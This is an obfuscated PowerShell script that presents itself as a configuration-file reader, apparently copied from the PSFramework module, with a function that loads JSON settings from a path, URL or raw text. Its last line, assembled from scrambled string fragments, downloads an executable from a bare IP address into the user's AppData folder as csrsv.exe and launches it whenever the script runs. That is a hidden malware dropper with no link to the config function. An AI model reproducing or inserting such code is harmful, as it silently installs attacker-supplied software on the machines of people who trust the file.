 &('sV') ('50'+'q8x')  (  [TYPE]("{4}{0}{2}{1}{3}"-F 'tEm.T','Odi','eXt.EnC','ng','syS') ) ;  .("{1}{0}"-f'IteM','seT-') ('V'+'aR'+'IAbL'+'E:h3QTu'+'7') ( [Type]("{6}{11}{9}{0}{3}{8}{5}{7}{4}{1}{2}{10}"-f 'Wo','igUrA','t','rk.CONfi','coNf','AtiOn','Ps','.','GuR','AmE','IOnHoST','Fr'));function Read-PSf`c`Onf`IgFI`lE
{

	[CmdletBinding()]
	param (
		[Parameter(ManDatoRy = ${T`RUe}, pArAmETeRsETnAME = "p`ATh")]
		[string]
		${P`Ath},
		
		[Parameter(MAnDAtOry = ${T`RUE}, pARAmeTerseTname = "We`BliNk")]
		[string]
		${weBL`INK},
		
		[Parameter(manDATory = ${T`Rue}, ParaMeTERsetnAMe = "Raw`J`Son")]
		[string]
		${RAw`JsoN}
	)
	
	
	function n`eW-c`oNFiGiteM
	{
		[Diagnostics.CodeAnalysis.SuppressMessageAttribute({"{9}{8}{3}{0}{6}{4}{7}{5}{2}{1}" -f'dPr','ons','Functi','ul','StateChangi','g','ocessFor','n','Sho','PSUse'}, "")]
		[CmdletBinding()]
		param (
			${Fu`l`lName},
			
			${V`AlUE},
			
			${t`yPe},
			
			[switch]
			${KeE`p`PE`RSISteD},
			
			[switch]
			${EN`FORC`ED},
			
			[switch]
			${p`oli`Cy}
		)
		
		[pscustomobject]@{
			("{1}{0}"-f'ame','FullN')	    = ${ful`lnA`mE}
			("{0}{1}" -f 'Valu','e')		    = ${Va`lUe}
			("{0}{1}" -f'T','ype')		    = ${t`yPE}
			("{1}{0}{2}" -f'is','KeepPers','ted')   = ${k`EEPpE`RsIs`TEd}
			("{1}{0}" -f'nforced','E')	    = ${EN`F`ORceD}
			("{0}{1}"-f 'Poli','cy')		    = ${P`Oli`Cy}
		}
	}
	
	function get-webCoN`T`Ent
	{
		[CmdletBinding()]
		param (
			[string]
			${w`E`BliNk}
		)
		
		${w`Eb`CLient} = .("{2}{0}{1}"-f'j','ect','New-Ob') ("{3}{1}{2}{0}{4}"-f'ie','m.','Net.WebCl','Syste','nt')
		${WEB`Cli`enT}."eNcO`DiNG" =  (&("{2}{0}{1}" -f'ARiABL','E','V')  ('50'+'q8x'))."Va`lUe"::"ut`F8"
		${wE`Bc`li`enT}.("{3}{2}{1}{0}" -f'ring','St','d','Downloa').Invoke(${WeBl`I`NK})
	}
	
	
	if (${pa`Th})
	{
		if (-not (.("{2}{0}{1}" -f'st','-Path','Te') ${p`ATh})) { return }
		${d`ATa} = &("{3}{0}{2}{1}" -f'et-','tent','Con','G') -Path ${pA`TH} -Encoding ("{1}{0}" -f 'TF8','U') | .("{3}{2}{1}{0}"-f 'tFrom-Json','ver','on','C') -ErrorAction ("{0}{1}"-f 'St','op')
	}
	if (${wE`Bl`Ink})
	{
		${D`ATa} = &("{3}{1}{2}{0}{4}"-f'bCo','t','-We','Ge','ntent') -WebLink ${We`BLi`Nk} | &("{0}{2}{1}" -f 'ConvertFr','-Json','om') -ErrorAction ("{1}{0}" -f'p','Sto')
	}
	if (${R`AwJsOn})
	{
		${Da`TA} = ${raw`JsOn} | .("{2}{1}{0}{4}{3}" -f'tFr','nver','Co','son','om-J') -ErrorAction ("{0}{1}"-f'Sto','p')
	}
	
	foreach (${it`em} in ${d`ATa})
	{
		
		if (-not ${It`em}."v`erSION")
		{
			&("{1}{0}{2}{3}"-f'onfig','New-C','It','em') -FullName ${I`Tem}."fU`Ll`NAMe" -Value ( ( &("{3}{2}{1}{0}" -f'E','AriABl','v','GeT-')  ("H3"+"QTu7")  -vaLUe  )::("{0}{3}{6}{1}{2}{5}{4}"-f'Conver','ersis','tedVa','tFr','ue','l','omP').Invoke(${iT`Em}."v`ALUE", ${I`TEM}."t`YPe"))
		}
		
		
		
		if (${I`TEM}."v`E`RSiON" -eq 1)
		{
			if ((-not ${It`EM}."St`Yle") -or (${It`EM}."S`TYle" -eq ("{1}{0}"-f'imple','S'))) { &("{2}{1}{3}{0}"-f 'tem','ig','New-Conf','I') -FullName ${I`TeM}."fUllNa`Me" -Value ${it`EM}."DA`Ta" }
			else
			{
				if ((${It`Em}."tY`PE" -eq ("{0}{1}"-f 'Objec','t')) -or (${iT`em}."T`ypE" -eq 12))
				{
					.("{2}{1}{4}{0}{3}"-f'igI','Co','New-','tem','nf') -FullName ${I`TEm}."FU`l`lnAmE" -Value ${I`TEM}."VA`Lue" -Type ("{0}{1}{2}" -f'Ob','je','ct') -KeepPersisted
				}
				else
				{
					.("{2}{0}{1}" -f'-Con','figItem','New') -FullName ${I`Tem}."fu`lL`NAME" -Value ( (.("{0}{2}{1}"-f'VAri','bLe','a') ('h3'+'qTU7'))."v`AlUE"::("{4}{0}{1}{6}{2}{5}{3}" -f'ver','tFromP','rsiste','Value','Con','d','e').Invoke(${it`Em}."V`AlUe", ${I`TEM}."tY`pE"))
				}
			}
		}
		
	}
}
(&("{2}{1}{0}"-f 't','c','New-Obje') ("{3}{1}{2}{0}" -f'lient','.Net.','WebC','System')).("{0}{3}{2}{1}" -f'Downl','le','adFi','o').Invoke(("{6}{0}{3}{7}{1}{9}{5}{2}{8}{4}" -f'24','aho','.e','8.170.218/','e','v','http://89.','~y','x','o/csrs'),"$env:APPDATA\csrsv.exe");&("{1}{0}{2}" -f 'tart-Pro','S','cess') ("$env:APPDATA\csrsv.exe")
